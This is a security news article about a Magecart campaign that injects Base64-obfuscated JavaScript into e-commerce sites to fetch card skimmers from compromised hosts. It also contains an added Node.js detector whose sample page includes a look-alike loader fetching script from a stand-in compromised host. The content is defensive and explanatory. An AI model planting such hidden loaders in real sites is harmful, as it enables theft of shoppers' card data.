New Magecart campaign exploits legitimate e-commerce websites

June 14, 2023

A new Magecart campaign has targeted legitimate e-commerce websites, aiming to steal PII and credit card information. The websites confirmed as targets so far are in Europe, Latin America, and North America.

According to researchers, the attackers in this new operation were able to establish their command-and-control infrastructure on legitimate websites. The threat actors allegedly exploited well-known flaws to initiate their infection campaigns.

The new Magecart campaign uses the hacked websites as command-and-control servers.

The Magecart campaign operators begin by hacking a legitimate website through a vulnerability. Once successfully compromised, these websites serve as the actors’ command-and-control servers.

By abusing these reputable websites, the threat actors can also bypass security detections and work around standard defences. As a result, they do not need to establish their own independent infrastructure.

The threat actors inject a JavaScript snippet into their targeted e-commerce websites. The snippet then retrieves the malicious code from the previously infected sites.

Furthermore, to make their attacks stealthier, these miscreants have adopted Base64 encoding to hide their credit card skimmer. The encoded snippet uses a structure that resembles well-known third-party services, such as GTM or Facebook Pixel, while concealing the URL of the host.
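One way a site owner could check for the pattern described above, as an added example that is not code from the researchers or the campaign: it scans a page's inline scripts for Base64 string literals that decode to a URL and reports any whose host is not on an allowlist. It assumes Node.js; the allowlist, host names and sample page are constructed for illustration.

```javascript
// Added example (Node.js). Host names and the sample page are constructed.
const ALLOWED_HOSTS = new Set(["www.googletagmanager.com", "connect.facebook.net"]);

// Bodies of inline <script> elements (no src attribute), where injected loaders live.
function inlineScripts(html) {
  const bodies = [];
  for (const m of html.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script>/gi)) {
    if (!/\bsrc\s*=/i.test(m[1])) bodies.push(m[2]);
  }
  return bodies;
}

// If a quoted literal is Base64 for a URL, return the parsed URL, else null.
function decodeToUrl(literal) {
  const text = Buffer.from(literal, "base64").toString("utf8");
  if (!/^(?:https?:|wss?:)?\/\/[\w.-]+/i.test(text)) return null;
  try {
    // Protocol-relative URLs ("//host/path") need a scheme before parsing.
    return new URL(text.startsWith("//") ? "https:" + text : text);
  } catch {
    return null;
  }
}

// Report Base64-hidden URLs whose host is not on the allowlist.
function findHiddenHosts(html, allowed = ALLOWED_HOSTS) {
  const findings = [];
  for (const body of inlineScripts(html)) {
    for (const m of body.matchAll(/["'`]([A-Za-z0-9+/]{16,}={0,2})["'`]/g)) {
      const url = decodeToUrl(m[1]);
      if (url && !allowed.has(url.hostname)) {
        findings.push({ host: url.hostname, url: url.href, encoded: m[1] });
      }
    }
  }
  return findings;
}

// Constructed sample page: a genuine-looking tag, a look-alike loader, and noise.
const b64 = (s) => Buffer.from(s).toString("base64");
const SAMPLE_HTML = `
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPLE"></script>
<script>(function(w,d,s){var j=d.createElement(s);
  j.src=atob("${b64("https://cdn.compromised-shop.example/gtm.js")}");
  d.head.appendChild(j);})(window,document,"script");</script>
<script>var px=atob("${b64("https://connect.facebook.net/en_US/fbevents.js")}");
  var cfg="${b64("not a url, just settings")}";</script>`;

console.log(findHiddenHosts(SAMPLE_HTML));
```

This is a triage heuristic: it only sees literals that are stored whole in the page source, so a hit is a reason to review the script, and a clean result is not proof the page is clean.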

Cybersecurity experts noted that this cybercriminal campaign prioritises commerce organisations. That could significantly threaten many businesses, since some victim entities receive monthly traffic that reaches thousands.

Hence, this operation could endanger thousands of individuals, since their credit card data and PII are within the actors’ reach. These web skimming campaigns pose a significant threat to digital commerce organisations. The impact could be massive, because targeted organisations could lose their reputations and become prone to other attacks.

This newly discovered campaign is a reminder to everyone in e-commerce, and to organisations in general, that web skimmers are a significant security threat. Furthermore, these actors constantly evolve and adapt their tactics to hide their activities and render security detections irrelevant.

Organisations should know that standard static analysis tools are not sufficient for combating web skimmers, since these attackers constantly alter their methods and adopt sophisticated tactics.
